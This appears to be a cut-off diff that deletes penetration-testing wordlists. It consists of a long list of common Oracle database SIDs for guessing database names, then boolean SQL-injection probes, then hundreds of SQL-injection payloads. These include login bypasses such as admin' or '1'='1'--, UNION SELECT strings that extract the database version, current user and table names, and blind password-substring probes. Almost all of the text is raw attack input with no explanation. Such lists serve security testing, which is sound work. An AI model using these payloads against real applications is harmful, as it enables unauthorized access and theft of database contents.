|
||||||
DWH
|
|
||||||
DWHDB
|
|
||||||
DWHPROD
|
|
||||||
DWHTEST
|
|
||||||
DWRHS
|
|
||||||
EARTH
|
|
||||||
ELCARO
|
|
||||||
EMRS2
|
|
||||||
EOF
|
|
||||||
ERP
|
|
||||||
ESOR
|
|
||||||
FINDEC
|
|
||||||
FINPROD
|
|
||||||
FNDFS_HR1
|
|
||||||
FNDFS_HR2
|
|
||||||
FPRD
|
|
||||||
GR01
|
|
||||||
GR02
|
|
||||||
GR03
|
|
||||||
HCDMO
|
|
||||||
HEDGEHOG
|
|
||||||
HPUX10
|
|
||||||
HPUX11
|
|
||||||
HPUX9
|
|
||||||
HR
|
|
||||||
HR0
|
|
||||||
HR1
|
|
||||||
HR2
|
|
||||||
HR3
|
|
||||||
HR4
|
|
||||||
HR5
|
|
||||||
HR6
|
|
||||||
HR7
|
|
||||||
HR8
|
|
||||||
HR9
|
|
||||||
HRDMO
|
|
||||||
hsagent
|
|
||||||
HTMLDB
|
|
||||||
IAGTS
|
|
||||||
IASDB
|
|
||||||
INCD
|
|
||||||
ISD01
|
|
||||||
ISD06
|
|
||||||
ISP
|
|
||||||
ISP01
|
|
||||||
ISP1
|
|
||||||
ISP2
|
|
||||||
ISQ1
|
|
||||||
ITS
|
|
||||||
IXOS
|
|
||||||
KRAUS
|
|
||||||
KRONOS
|
|
||||||
LDAP
|
|
||||||
LIN10
|
|
||||||
LIN11
|
|
||||||
LIN9
|
|
||||||
LINUX101
|
|
||||||
LINUX1011
|
|
||||||
LINUX1012
|
|
||||||
LINUX1013
|
|
||||||
LINUX1014
|
|
||||||
LINUX1015
|
|
||||||
LINUX102
|
|
||||||
LINUX1021
|
|
||||||
LINUX1022
|
|
||||||
LINUX1023
|
|
||||||
LINUX1024
|
|
||||||
LINUX1025
|
|
||||||
LINUX111
|
|
||||||
LINUX11106
|
|
||||||
LINUX11107
|
|
||||||
LINUX112
|
|
||||||
LINUX11201
|
|
||||||
LINUX817
|
|
||||||
LINUX8171
|
|
||||||
LINUX8172
|
|
||||||
LINUX8173
|
|
||||||
LINUX8174
|
|
||||||
LINUX901
|
|
||||||
LINUX902
|
|
||||||
LINUX9021
|
|
||||||
LINUX9022
|
|
||||||
LINUX9023
|
|
||||||
LINUX9024
|
|
||||||
LINUX9025
|
|
||||||
LINUX9026
|
|
||||||
LINUX9027
|
|
||||||
LINUX9028
|
|
||||||
LINUX92
|
|
||||||
LINUX9208
|
|
||||||
LUN
|
|
||||||
MDTEST
|
|
||||||
MSAM
|
|
||||||
MV713
|
|
||||||
MYDB
|
|
||||||
NEDB
|
|
||||||
NORTHWIND
|
|
||||||
OAS
|
|
||||||
OAS1
|
|
||||||
OAS10
|
|
||||||
OAS2
|
|
||||||
OAS3
|
|
||||||
OAS4
|
|
||||||
OAS5
|
|
||||||
OAS6
|
|
||||||
OAS7
|
|
||||||
OAS8
|
|
||||||
OAS9
|
|
||||||
ODB
|
|
||||||
OEMREP
|
|
||||||
OGDP
|
|
||||||
OID
|
|
||||||
OJS
|
|
||||||
OMS
|
|
||||||
ORA
|
|
||||||
ORA1
|
|
||||||
ORA10
|
|
||||||
ORA101
|
|
||||||
ORA10101
|
|
||||||
ORA10101P
|
|
||||||
ORA10101T
|
|
||||||
ORA10102
|
|
||||||
ORA10102P
|
|
||||||
ORA10102T
|
|
||||||
ORA10103
|
|
||||||
ORA10103P
|
|
||||||
ORA10103T
|
|
||||||
ORA10104
|
|
||||||
ORA10104P
|
|
||||||
ORA10104T
|
|
||||||
ORA10105
|
|
||||||
ORA10105P
|
|
||||||
ORA10105T
|
|
||||||
ORA1011
|
|
||||||
ORA1011P
|
|
||||||
ORA1011T
|
|
||||||
ORA1012
|
|
||||||
ORA1012P
|
|
||||||
ORA1012T
|
|
||||||
ORA1013
|
|
||||||
ORA1013P
|
|
||||||
ORA1013T
|
|
||||||
ORA1014
|
|
||||||
ORA1014P
|
|
||||||
ORA1014T
|
|
||||||
ORA1015
|
|
||||||
ORA1015P
|
|
||||||
ORA1015T
|
|
||||||
ORA1021
|
|
||||||
ORA1021P
|
|
||||||
ORA1021T
|
|
||||||
ORA1022
|
|
||||||
ORA1022P
|
|
||||||
ORA1022T
|
|
||||||
ORA1023
|
|
||||||
ORA1023P
|
|
||||||
ORA1023T
|
|
||||||
ORA1024
|
|
||||||
ORA1024P
|
|
||||||
ORA1024T
|
|
||||||
ORA1025
|
|
||||||
ORA1025P
|
|
||||||
ORA1025T
|
|
||||||
ORA11
|
|
||||||
ORA111
|
|
||||||
ORA11106
|
|
||||||
ORA11107
|
|
||||||
ORA112
|
|
||||||
ORA11201
|
|
||||||
ORA11202
|
|
||||||
ORA11g
|
|
||||||
ORA2
|
|
||||||
ORA3
|
|
||||||
ORA4
|
|
||||||
ORA5
|
|
||||||
ORA6
|
|
||||||
ORA7
|
|
||||||
ORA8
|
|
||||||
ORA805
|
|
||||||
ORA806
|
|
||||||
ORA815
|
|
||||||
ORA816
|
|
||||||
ORA817
|
|
||||||
ORA8170
|
|
||||||
ORA8170P
|
|
||||||
ORA8170T
|
|
||||||
ORA8171
|
|
||||||
ORA8171P
|
|
||||||
ORA8171T
|
|
||||||
ORA8172
|
|
||||||
ORA8172P
|
|
||||||
ORA8172T
|
|
||||||
ORA8173
|
|
||||||
ORA8173P
|
|
||||||
ORA8173T
|
|
||||||
ORA8174
|
|
||||||
ORA8174P
|
|
||||||
ORA8174T
|
|
||||||
ORA8_SC
|
|
||||||
ORA9
|
|
||||||
ORA910
|
|
||||||
ORA920
|
|
||||||
ORA9201
|
|
||||||
ORA9201P
|
|
||||||
ORA9201T
|
|
||||||
ORA9202
|
|
||||||
ORA9202P
|
|
||||||
ORA9202T
|
|
||||||
ORA9203
|
|
||||||
ORA9203P
|
|
||||||
ORA9203T
|
|
||||||
ORA9204
|
|
||||||
ORA9204P
|
|
||||||
ORA9204T
|
|
||||||
ORA9205
|
|
||||||
ORA9205P
|
|
||||||
ORA9205T
|
|
||||||
ORA9206
|
|
||||||
ORA9206P
|
|
||||||
ORA9206T
|
|
||||||
ORA9207
|
|
||||||
ORA9207P
|
|
||||||
ORA9207T
|
|
||||||
ORA9208
|
|
||||||
ORA9208P
|
|
||||||
ORA9208T
|
|
||||||
ORACL
|
|
||||||
ORACLE
|
|
||||||
ORADB
|
|
||||||
ORADB1
|
|
||||||
ORADB2
|
|
||||||
ORADB3
|
|
||||||
ORALIN
|
|
||||||
ORCL
|
|
||||||
ORCL0
|
|
||||||
ORCL1
|
|
||||||
ORCL10
|
|
||||||
ORCL10G
|
|
||||||
ORCL11
|
|
||||||
ORCL11G
|
|
||||||
ORCL2
|
|
||||||
ORCL3
|
|
||||||
ORCL4
|
|
||||||
ORCL5
|
|
||||||
ORCL6
|
|
||||||
ORCL7
|
|
||||||
ORCL8
|
|
||||||
ORCL9
|
|
||||||
ORCLA
|
|
||||||
ORCLB
|
|
||||||
ORCLC
|
|
||||||
ORCLD
|
|
||||||
ORCLE
|
|
||||||
ORCLF
|
|
||||||
ORCLG
|
|
||||||
ORCLH
|
|
||||||
ORCLI
|
|
||||||
ORCLJ
|
|
||||||
ORCLK
|
|
||||||
ORCLL
|
|
||||||
ORCLM
|
|
||||||
ORCLN
|
|
||||||
ORCLO
|
|
||||||
ORCLP
|
|
||||||
ORCLP0
|
|
||||||
ORCLP1
|
|
||||||
ORCLP2
|
|
||||||
ORCLP3
|
|
||||||
ORCLP4
|
|
||||||
ORCLP5
|
|
||||||
ORCLP6
|
|
||||||
ORCLP7
|
|
||||||
ORCLP8
|
|
||||||
ORCLP9
|
|
||||||
ORCLQ
|
|
||||||
ORCLR
|
|
||||||
ORCLS
|
|
||||||
ORCLSOL
|
|
||||||
ORCLT
|
|
||||||
ORCLU
|
|
||||||
ORCLV
|
|
||||||
ORCLW
|
|
||||||
ORCL.WORLD
|
|
||||||
ORCLX
|
|
||||||
ORCLY
|
|
||||||
ORCLZ
|
|
||||||
ORIONDB
|
|
||||||
ORTD
|
|
||||||
P
|
|
||||||
P10
|
|
||||||
P10G
|
|
||||||
P8
|
|
||||||
P8I
|
|
||||||
P9
|
|
||||||
P9I
|
|
||||||
PD1
|
|
||||||
PINDB
|
|
||||||
PLSExtProc
|
|
||||||
PORA10101
|
|
||||||
PORA10102
|
|
||||||
PORA10103
|
|
||||||
PORA10104
|
|
||||||
PORA10105
|
|
||||||
PORA1011
|
|
||||||
PORA1012
|
|
||||||
PORA1013
|
|
||||||
PORA1014
|
|
||||||
PORA1015
|
|
||||||
PORA1021
|
|
||||||
PORA1022
|
|
||||||
PORA1023
|
|
||||||
PORA1024
|
|
||||||
PORA1025
|
|
||||||
PORA11106
|
|
||||||
PORA11107
|
|
||||||
PORA11201
|
|
||||||
PORA11202
|
|
||||||
PORA8170
|
|
||||||
PORA8171
|
|
||||||
PORA8172
|
|
||||||
PORA8173
|
|
||||||
PORA8174
|
|
||||||
PORA9201
|
|
||||||
PORA9202
|
|
||||||
PORA9203
|
|
||||||
PORA9204
|
|
||||||
PORA9205
|
|
||||||
PORA9206
|
|
||||||
PORA9207
|
|
||||||
PORA9208
|
|
||||||
PRD
|
|
||||||
PRITXI
|
|
||||||
PROD
|
|
||||||
PROD0
|
|
||||||
PROD1
|
|
||||||
PROD10
|
|
||||||
PROD10G
|
|
||||||
PROD11
|
|
||||||
PROD11G
|
|
||||||
PROD2
|
|
||||||
PROD3
|
|
||||||
PROD4
|
|
||||||
PROD5
|
|
||||||
PROD6
|
|
||||||
PROD7
|
|
||||||
PROD8
|
|
||||||
PROD8I
|
|
||||||
PROD9
|
|
||||||
PROD920
|
|
||||||
PROD9I
|
|
||||||
PROG10
|
|
||||||
QM
|
|
||||||
QS
|
|
||||||
RAB1
|
|
||||||
RAC
|
|
||||||
RAC1
|
|
||||||
RAC2
|
|
||||||
RAC3
|
|
||||||
RAC4
|
|
||||||
RDB
|
|
||||||
RDS
|
|
||||||
RECV
|
|
||||||
REP
|
|
||||||
REP0
|
|
||||||
REP1
|
|
||||||
REP2
|
|
||||||
REP3
|
|
||||||
REP4
|
|
||||||
REP5
|
|
||||||
REP6
|
|
||||||
REP7
|
|
||||||
REP8
|
|
||||||
REP9
|
|
||||||
REPO
|
|
||||||
REPO0
|
|
||||||
REPO1
|
|
||||||
REPO2
|
|
||||||
REPO3
|
|
||||||
REPO4
|
|
||||||
REPO5
|
|
||||||
REPO6
|
|
||||||
REPO7
|
|
||||||
REPO8
|
|
||||||
REPO9
|
|
||||||
REPOS
|
|
||||||
REPOS0
|
|
||||||
REPOS1
|
|
||||||
REPOS2
|
|
||||||
REPOS3
|
|
||||||
REPOS4
|
|
||||||
REPOS5
|
|
||||||
REPOS6
|
|
||||||
REPOS7
|
|
||||||
REPOS8
|
|
||||||
REPOS9
|
|
||||||
REPSCAN
|
|
||||||
RIPPROD
|
|
||||||
RITCTL
|
|
||||||
RITDEV
|
|
||||||
RITPROD
|
|
||||||
RITQA
|
|
||||||
RITTRN
|
|
||||||
RITTST
|
|
||||||
SA0
|
|
||||||
SA1
|
|
||||||
SA2
|
|
||||||
SA3
|
|
||||||
SA4
|
|
||||||
SA5
|
|
||||||
SA6
|
|
||||||
SA7
|
|
||||||
SA8
|
|
||||||
SA9
|
|
||||||
SAA
|
|
||||||
SAB
|
|
||||||
SAC
|
|
||||||
SAD
|
|
||||||
SAE
|
|
||||||
SAF
|
|
||||||
SAG
|
|
||||||
SAH
|
|
||||||
SAI
|
|
||||||
SAJ
|
|
||||||
SAK
|
|
||||||
SAL
|
|
||||||
SALES
|
|
||||||
SAM
|
|
||||||
SAMPLE
|
|
||||||
SAN
|
|
||||||
SANIPSP
|
|
||||||
SAO
|
|
||||||
SAP
|
|
||||||
SAP0
|
|
||||||
SAP1
|
|
||||||
SAP2
|
|
||||||
SAP3
|
|
||||||
SAP4
|
|
||||||
SAP5
|
|
||||||
SAP6
|
|
||||||
SAP7
|
|
||||||
SAP8
|
|
||||||
SAP9
|
|
||||||
SAPHR
|
|
||||||
SAQ
|
|
||||||
SAR
|
|
||||||
SAS
|
|
||||||
SAT
|
|
||||||
SAU
|
|
||||||
SAV
|
|
||||||
SAW
|
|
||||||
SAX
|
|
||||||
SAY
|
|
||||||
SAZ
|
|
||||||
SDB
|
|
||||||
SENTRIGO
|
|
||||||
SES
|
|
||||||
SGNT
|
|
||||||
SID0
|
|
||||||
SID1
|
|
||||||
SID2
|
|
||||||
SID3
|
|
||||||
SID4
|
|
||||||
SID5
|
|
||||||
SID6
|
|
||||||
SID7
|
|
||||||
SID8
|
|
||||||
SID9
|
|
||||||
SIP
|
|
||||||
SOL10
|
|
||||||
SOL11
|
|
||||||
SOL9
|
|
||||||
STAG1
|
|
||||||
STAG2
|
|
||||||
T1
|
|
||||||
T10
|
|
||||||
T101
|
|
||||||
T102
|
|
||||||
T2
|
|
||||||
T3
|
|
||||||
T4
|
|
||||||
T7
|
|
||||||
T71
|
|
||||||
T72
|
|
||||||
T73
|
|
||||||
T8
|
|
||||||
T80
|
|
||||||
T81
|
|
||||||
T82
|
|
||||||
T9
|
|
||||||
T91
|
|
||||||
T92
|
|
||||||
TEST
|
|
||||||
TEST10G
|
|
||||||
TEST11G
|
|
||||||
TEST9I
|
|
||||||
TESTORCL
|
|
||||||
THUMPER
|
|
||||||
TRC28
|
|
||||||
TRIUMF
|
|
||||||
TSH1
|
|
||||||
TSM
|
|
||||||
TST
|
|
||||||
TST0
|
|
||||||
TST1
|
|
||||||
TST2
|
|
||||||
TST3
|
|
||||||
TST4
|
|
||||||
TST5
|
|
||||||
TST6
|
|
||||||
TST7
|
|
||||||
TST8
|
|
||||||
TST9
|
|
||||||
TYCP
|
|
||||||
UNIX101
|
|
||||||
UNIX1011
|
|
||||||
UNIX1012
|
|
||||||
UNIX1013
|
|
||||||
UNIX1014
|
|
||||||
UNIX1015
|
|
||||||
UNIX102
|
|
||||||
UNIX1021
|
|
||||||
UNIX1022
|
|
||||||
UNIX1023
|
|
||||||
UNIX1024
|
|
||||||
UNIX1025
|
|
||||||
UNIX817
|
|
||||||
UNIX8171
|
|
||||||
UNIX8172
|
|
||||||
UNIX8173
|
|
||||||
UNIX8174
|
|
||||||
UNIX901
|
|
||||||
UNIX902
|
|
||||||
UNIX9021
|
|
||||||
UNIX9022
|
|
||||||
UNIX9023
|
|
||||||
UNIX9024
|
|
||||||
UNIX9025
|
|
||||||
UNIX9026
|
|
||||||
UNIX9027
|
|
||||||
UNIX9028
|
|
||||||
V713
|
|
||||||
VENOM
|
|
||||||
VENU
|
|
||||||
VISTA
|
|
||||||
W101
|
|
||||||
W1011
|
|
||||||
W1012
|
|
||||||
W1013
|
|
||||||
W1014
|
|
||||||
W1015
|
|
||||||
W102
|
|
||||||
W1021
|
|
||||||
W1022
|
|
||||||
W1023
|
|
||||||
W1024
|
|
||||||
W1025
|
|
||||||
W111
|
|
||||||
W11102
|
|
||||||
W11106
|
|
||||||
W11107
|
|
||||||
W112
|
|
||||||
W11201
|
|
||||||
W817
|
|
||||||
W8171
|
|
||||||
W8172
|
|
||||||
W8173
|
|
||||||
W8174
|
|
||||||
W901
|
|
||||||
W902
|
|
||||||
W9021
|
|
||||||
W9022
|
|
||||||
W9023
|
|
||||||
W9024
|
|
||||||
W9025
|
|
||||||
W9026
|
|
||||||
W9027
|
|
||||||
W9028
|
|
||||||
WEB
|
|
||||||
WEB1
|
|
||||||
WEB10
|
|
||||||
WEB2
|
|
||||||
WEB3
|
|
||||||
WEB4
|
|
||||||
WEB5
|
|
||||||
WEB6
|
|
||||||
WEB7
|
|
||||||
WEB8
|
|
||||||
WEB9
|
|
||||||
WEBDEV
|
|
||||||
WG73
|
|
||||||
WG73
|
|
||||||
WIN101
|
|
||||||
WIN1011
|
|
||||||
WIN1012
|
|
||||||
WIN1013
|
|
||||||
WIN1014
|
|
||||||
WIN1015
|
|
||||||
WIN102
|
|
||||||
WIN1021
|
|
||||||
WIN1022
|
|
||||||
WIN1023
|
|
||||||
WIN1024
|
|
||||||
WIN1025
|
|
||||||
WIN11
|
|
||||||
WIN111
|
|
||||||
WIN11106
|
|
||||||
WIN11107
|
|
||||||
WIN112
|
|
||||||
WIN11201
|
|
||||||
WIN11202
|
|
||||||
WIN7
|
|
||||||
WIN817
|
|
||||||
WIN8171
|
|
||||||
WIN8172
|
|
||||||
WIN8173
|
|
||||||
WIN8174
|
|
||||||
WIN901
|
|
||||||
WIN902
|
|
||||||
WIN9021
|
|
||||||
WIN9022
|
|
||||||
WIN9023
|
|
||||||
WIN9024
|
|
||||||
WIN9025
|
|
||||||
WIN9026
|
|
||||||
WIN9027
|
|
||||||
WIN9028
|
|
||||||
WINDOWS101
|
|
||||||
WINDOWS1011
|
|
||||||
WINDOWS1012
|
|
||||||
WINDOWS1013
|
|
||||||
WINDOWS1014
|
|
||||||
WINDOWS1015
|
|
||||||
WINDOWS102
|
|
||||||
WINDOWS1021
|
|
||||||
WINDOWS1022
|
|
||||||
WINDOWS1023
|
|
||||||
WINDOWS1024
|
|
||||||
WINDOWS1025
|
|
||||||
WINDOWS11
|
|
||||||
WINDOWS111
|
|
||||||
WINDOWS11106
|
|
||||||
WINDOWS11107
|
|
||||||
WINDOWS112
|
|
||||||
WINDOWS11201
|
|
||||||
WINDOWS11202
|
|
||||||
WINDOWS817
|
|
||||||
WINDOWS8171
|
|
||||||
WINDOWS8172
|
|
||||||
WINDOWS8173
|
|
||||||
WINDOWS8174
|
|
||||||
WINDOWS901
|
|
||||||
WINDOWS902
|
|
||||||
WINDOWS9021
|
|
||||||
WINDOWS9022
|
|
||||||
WINDOWS9023
|
|
||||||
WINDOWS9024
|
|
||||||
WINDOWS9025
|
|
||||||
WINDOWS9026
|
|
||||||
WINDOWS9027
|
|
||||||
WINDOWS9028
|
|
||||||
XE
|
|
||||||
XEXDB
|
|
||||||
XE_XPT
|
|
||||||
@ -1,49 +0,0 @@
|
|||||||
true
|
|
||||||
1
|
|
||||||
1>0
|
|
||||||
2-1
|
|
||||||
0+1
|
|
||||||
1*1
|
|
||||||
1%2
|
|
||||||
1=1
|
|
||||||
1 & 1
|
|
||||||
1&1
|
|
||||||
1 && 2
|
|
||||||
1&&2
|
|
||||||
-1 || 1
|
|
||||||
|1||1
|
|
||||||
-1 oR 1
|
|
||||||
1 aND 1
|
|
||||||
1 LikE 1
|
|
||||||
(1)oR(1)
|
|
||||||
(1)aND(1)
|
|
||||||
(1)LikE(1)
|
|
||||||
-1/**/oR/**/1
|
|
||||||
1/**/aND/**/1
|
|
||||||
1/**/LikE/**/1
|
|
||||||
1'
|
|
||||||
1'>'0
|
|
||||||
2'-'1
|
|
||||||
0'+'1
|
|
||||||
1'*'1
|
|
||||||
1'%'2
|
|
||||||
1'='1
|
|
||||||
1'&'1
|
|
||||||
1'&&'2
|
|
||||||
-1'||'1
|
|
||||||
-1'oR'1
|
|
||||||
1'aND'1
|
|
||||||
1'LikE'1
|
|
||||||
1"
|
|
||||||
1">"0
|
|
||||||
2"-"1
|
|
||||||
0"+"1
|
|
||||||
1"*"1
|
|
||||||
1"%"2
|
|
||||||
1"="1
|
|
||||||
1"&"1
|
|
||||||
1"&&"2
|
|
||||||
-1"||"1
|
|
||||||
-1"oR"1
|
|
||||||
1"aND"1
|
|
||||||
1"LikE"1
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
